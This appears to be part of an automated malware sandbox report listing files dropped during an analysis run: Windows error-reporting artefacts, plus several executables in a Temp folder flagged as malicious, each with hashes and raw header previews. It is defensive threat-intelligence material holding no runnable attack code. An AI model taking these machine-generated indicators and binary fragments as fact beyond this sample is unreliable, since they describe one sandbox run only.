                                                                                                                                  SHA-512:F96452E19D0CE9C891F46D1C9FE542261F935E2FC07489F705F08F54C1296B810F6901A6CC02195FC881F4E53FDA18950259E0147ECC1CCBA7DADCDD8E3796F6
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.4.4.6.6.9.6.6.7.4.2.9.0.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.4.4.6.7.1.3.4.2.4.2.5.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.3.e.2.6.d.6.7.-.7.0.1.3.-.4.0.7.0.-.a.f.4.f.-.c.0.0.9.9.e.c.d.e.9.e.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.8.4.4.9.a.0.-.6.f.a.c.-.4.2.3.1.-.a.d.5.a.-.2.1.7.d.f.3.0.f.2.8.2.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.4.1.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.9.4.-.0.0.0.1.-.0.0.1.6.-.e.d.0.6.-.a.4.5.7.8.7.0.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.0.e.5.0.e.4.7.0.3.4.e.f.0.b.c.5.0.a.7.1.2.3.4.4.2.b.7.b.b.7.5.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.3.4.1.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F25.tmp.csv
                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):50596
                                                                                                                                  Entropy (8bit):3.0586993446906305
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:dPHkvUM22ex5/ejITZxjhGMjMkHiXIer5SZ:dPHkvUM22ex5/ejITZxjhGMjlHiXIerg
                                                                                                                                  MD5:2B641D3EEC655E6C8A6D7B023D46B607
                                                                                                                                  SHA1:E9F04E43BF2FD6423FD8EB1D98D4472D1F734912
                                                                                                                                  SHA-256:A7AABF461D0FFE1D9EADB37E6DCAD9A004802E85555D8EF02DBC41326B214550
                                                                                                                                  SHA-512:09B428E2EE63CC405D46B7DA035BD15AAFFDC56E00C9E661AD7D2E1FE6F8FEE0266E32417242F1BE420B31A52E453DFDBBF7B2A82B57FFDD799B50BD6842329A
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER3466.tmp.txt
                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):13340
                                                                                                                                  Entropy (8bit):2.6952149278258397
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:9GiZYWpUfW0nZZz3YIY4WMaHlUYEZtKtJiTZQObwDOWamM9naXwIaB3:9jZDplkLfneZamM9aXHaB3
                                                                                                                                  MD5:85E4FA93AAD54743D553BC15A8FD7BAB
                                                                                                                                  SHA1:AA7708F52366B91C4BDB5833EED75B50E80C99DE
                                                                                                                                  SHA-256:EE57172D1261947109DC7F8AEF4285D14811D4FDC324142F841AE6F6D87774C4
                                                                                                                                  SHA-512:AF9263E362A0A8A60CCE14BA2F8219A534158F32D567DC2ED10B644D1491F66B6C70C89EF08922CC69F2C5C8E986F1B030506F2E00BCECD955BE452604555F2E
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER3AEC.tmp.dmp
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Wed Jan 12 07:38:18 2022, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):36668
                                                                                                                                  Entropy (8bit):2.127772804344517
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:ty+VN1/HlSEteOeh0AmW9vUwLCSb6Erp8AST3a5If:HPexvUwL/eHf
                                                                                                                                  MD5:CD94477491DDCC700E87E712DCDCDB82
                                                                                                                                  SHA1:CF9C3009E6A05A2D20EBBF6C9CE20874462FF39D
                                                                                                                                  SHA-256:FA1641080333A41637E72419F52A3CDB7A97A1BC3A6E3A5E1B9B8ED52EE33F7B
                                                                                                                                  SHA-512:E66590C74F7BFA115388C540DD5051238B400DC7A67CA10A49C612BC7D39490B2165C2DAD0A8ADCDCEB64240C1B930B7CBDFD9C6D95BD61BF25DEDACBA89083F
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MDMP....... .......j..a........................................z%..........T.......8...........T................z..........H...........4....................................................................U...........B..............GenuineIntelW...........T..........._..a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER45E9.tmp.WERInternalMetadata.xml
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8390
                                                                                                                                  Entropy (8bit):3.7017139844542495
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:Rrl7r3GLNiZP6gsQ6YI8SUbIZvKgmfdRSBCpDXu89bMisf7km:RrlsNiB6gsQ6YDSUXgmfdRSGMhf9
                                                                                                                                  MD5:3541DD071AD723905247AB65C23E21F2
                                                                                                                                  SHA1:AF2EEF16966982DF1745F794700C42D085F1FB76
                                                                                                                                  SHA-256:F34434C82ED187321E5F015577CBB44712703B975ED3100D909DA8CDC720F477
                                                                                                                                  SHA-512:07078C70754D690C0F338F7C61B1EF4EED012E994FA7A7298D58FE6970022DC8951441D64133C3BD3A9764FA809452C58676A93D90B03CA267DCC8322EEB41AB
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.9.6.<./.P.i.d.>.......
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER4EE3.tmp.xml
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4685
                                                                                                                                  Entropy (8bit):4.473799837647402
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwSD8zs8JgtWI9BNWSC8BYb8fm8M4JV8qFA+q8v48gIkJYd:uITf6e8SNOYJaKSIkJYd
                                                                                                                                  MD5:21DD092CCF81DEC9FB1CB5F6CA986304
                                                                                                                                  SHA1:ECA479BF55503ECDF471F4435A31F7D27427F2C4
                                                                                                                                  SHA-256:AFD242E499A5CEF5363F097CEC9912262BE9949CCCA980F78C5358657E033ECB
                                                                                                                                  SHA-512:7BE2A05327AB6F1A4C0D68A9B1A6F26A32A1C60FD9465D411B41B7653EAF86E9EC1EBF3E6D2111D79F28E21D8D4FF14382FBDA67EB44AE070D9D3AE05DF3B8E1
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1338768" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERA68B.tmp.csv
                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):52738
                                                                                                                                  Entropy (8bit):3.0560531737852723
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:1536:HzH67sXwzJ22+mH0jITZsbgpfXM7sF2q1TSyv:HzH67sXwzJ22+mH0jITZsbgpfXKsF2qp
                                                                                                                                  MD5:2351B1B7051C75AEE85CABBAEA56245E
                                                                                                                                  SHA1:773992A0D54B9F4483CAB8848BD8A6F3C92DDCB9
                                                                                                                                  SHA-256:EEBA521F363D988863FB6BCCD08BAC8D83DF4F3CCBBDA104A3073E6CC80004E5
                                                                                                                                  SHA-512:F5B9ED9C7C45849DEE5FC16554EA51E58F22474477C95548F39171D3EE4392391591A725C59F375E6573961182E2F9DA86E6864CC6AC39F6381D0596C2A55F58
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERB532.tmp.txt
                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):13340
                                                                                                                                  Entropy (8bit):2.695956083848826
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:96:9GiZYWP8SwVdZzKYgYl2WhvHmUYEZA0tMiQZKOCwk8qZad2Xo9aIQr3:9jZDPImHlU8iad2Xo9NQr3
                                                                                                                                  MD5:4F5B39F71F92FBA4B3F713198552252A
                                                                                                                                  SHA1:95A3962CE4A494AB51CE3456000208EEC7A1AFFE
                                                                                                                                  SHA-256:AC3C13F1CC3F00C24CDCE1CDC73659354298CE327E2C9CF6FF758618AF654504
                                                                                                                                  SHA-512:2BACEAB418F1A923210BC8980749AD637BCAB3DD69E541DF5B3273A4385CD9FD3DEF847CB3F242C78959E59834D8CA12CB198B72A84001C12B87075A2843320D
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2655.exe.log
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\2655.exe
                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):700
                                                                                                                                  Entropy (8bit):5.346524082657112
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                                  MD5:65CF801545098D915A06D8318D296A01
                                                                                                                                  SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                                  SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                                                  SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                                  Malicious:false
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                  C:\Users\user\AppData\Local\Temp\12CC.exe
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):298496
                                                                                                                                  Entropy (8bit):5.326053784563633
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:N7EELbPBB68ojw7wX+T2MAx2NTqljZr40KL5DWzS1MpWrxpzbgqru:N7PXB7rwLTwgNc0+D8uzbgwu
                                                                                                                                  MD5:42F7FCDEACB40167D32D7CA782CE9169
                                                                                                                                  SHA1:C804A5F9BBEB026B4AE44B539978D48B4FB2F33C
                                                                                                                                  SHA-256:315B13E9954167A3FC70149C64ADE660435AF7E315F57E30B6483EF8CB2561A0
                                                                                                                                  SHA-512:A7CE01BD9E68FEE20CACDA45F7512B75B1AD89BF0C4B43A3D6FA7534E05BB0ECCC0A06FCDCDED1CC38D2E035559742857F4D2159D9CFC81BAD6AEC32511F4A7F
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...-...-...-..{-...-..m-...-..j-...-.@.-...-...-...-..d-...-..z-...-...-...-Rich...-................PE..L......_............................./.......0....@.........................................................................8^..P....@..P............................1...............................Q..@............0...............................text...S........................... ..`.rdata...7...0...8..................@..@.data...x....p...l...T..............@....rsrc...P....@......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\2655.exe
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                  Category:modified
                                                                                                                                  Size (bytes):537088
                                                                                                                                  Entropy (8bit):5.840438491186833
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                                                                                                                  MD5:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                  SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                                                                                                                  SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                                                                                                                  SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y*...............0..*...........I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(....*..0..,.......(d...8....*.~....u....s....z&8.........8........................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*.~(....(^...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......*.......*.......*.......
                                                                                                                                  C:\Users\user\AppData\Local\Temp\3412.exe
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):301056
                                                                                                                                  Entropy (8bit):5.192330972647351
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                                                                                  MD5:277680BD3182EB0940BC356FF4712BEF
                                                                                                                                  SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                                                                                  SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                                                                                  SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 77%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\454.exe
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):312832
                                                                                                                                  Entropy (8bit):5.490900603501215
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:BBkq/J9vw9eeShgym2oU7y0FjcyqpL+Duzbgwu:A0J99e69m2lvct+Dunn
                                                                                                                                  MD5:733045B137714FDD39BF6F9C6C063134
                                                                                                                                  SHA1:097ECA8152F7FF26030E2BB0959E3C2506B103FE
                                                                                                                                  SHA-256:E06DD510679CD654462DE27A95896E6411D80767E417093C8BF9F6F365E3BA23
                                                                                                                                  SHA-512:47BB39F89CA6A2746771E445A1070116BCC4AD0B71AD63C104741205C1DEBB938878D5B58019405961E614D50A6E08F77573FABFFAA414C59CA943E9C6710F6C
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                  Reputation:unknown
                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........~...-...-...-..{-...-..m-...-..j-...-.@.-...-...-...-..d-...-..z-...-...-...-Rich...-................PE..L.....=_.....................*......./.......0....@..........................P.......o......................................(^..P.......P............................1...............................Q..@............0...............................text...S........................... ..`.rdata...7...0...8..................@..@.data...8....p.......T..............@....rsrc...P...........................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                  C:\Users\user\AppData\Local\Temp\8F03.exe
                                                                                                                                  Process:C:\Windows\explorer.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):590848
                                                                                                                                  Entropy (8bit):6.732963553617895
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:wZ74qPWaSeXqN5GCJzSilgqJg38oOBPBLunnb:ygfG0ztlg938N0b
                                                                                                                                  MD5:27F38096E53A91C525B0700700CEE4C4
                                                                                                                                  SHA1:C9D8B68A4E0216A83C44D7208C2D79DA873A48A2
                                                                                                                                  SHA-256:A35A1FF0E7EF9F9DFFBDE98157E8FDF0AD0D2C1B081284ACB5CF29623AC79A4F
                                                                                                                                  SHA-512:64F26739100990230D01F787048EADD14B6DD424C09C815DB737D71CEE3D89D18ACD4F91DCAF0694592D296AA2387A065E41380A71AD4CCAF841C785112E7587
                                                                                                                                  Malicious:true
